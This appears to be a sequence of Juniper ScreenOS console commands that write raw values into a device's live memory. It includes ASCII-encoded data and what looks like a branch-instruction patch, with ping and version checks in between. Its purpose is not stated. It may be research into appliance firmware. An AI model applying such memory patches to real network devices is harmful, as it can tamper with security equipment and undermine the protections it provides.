set mem addr 0x195bc9c 0x000636f0
ping
set mem addr 0x1a7b5c8 0x4d333241
set mem addr 0x1a7b5cc 0x3042302c
set mem addr 0x1a7b5d0 0x3031653a
set mem addr 0x1a7b5d4 0x33443230
set mem addr 0x1a7b5d8 0x30303334
set mem addr 0x1a7b5dc 0x33383630
set mem addr 0x1a7b5e0 0x34383030
set mem addr 0x1a7b5e4 0x62303639
set mem addr 0x1a7b5e8 0x32396330
set mem addr 0x1a7b5ec 0x33643230
set mem addr 0x1a7b5f0 0x30303638
set mem addr 0x1a7b5f4 0x36313239
set mem addr 0x1a7b5f8 0x65353530
set mem addr 0x1a7b5fc 0x37643238
set mem addr 0x1a7b600 0x30336136
set mem addr 0x1a7b604 0x34653830
set mem addr 0x1a7b608 0x30303230
set mem addr 0x1a7b60c 0x00000000
set mem addr 0x195bc9c 0x00329efc
get tech | in juniper
ping
set mem addr 0x636d0 0x60630300
set mem addr 0x195bc9c 0x000636f0
get tech | in juniper
ping
set mem addr 0x342014 0x48000014
set mem addr 0x195bc9c 0x006381f4
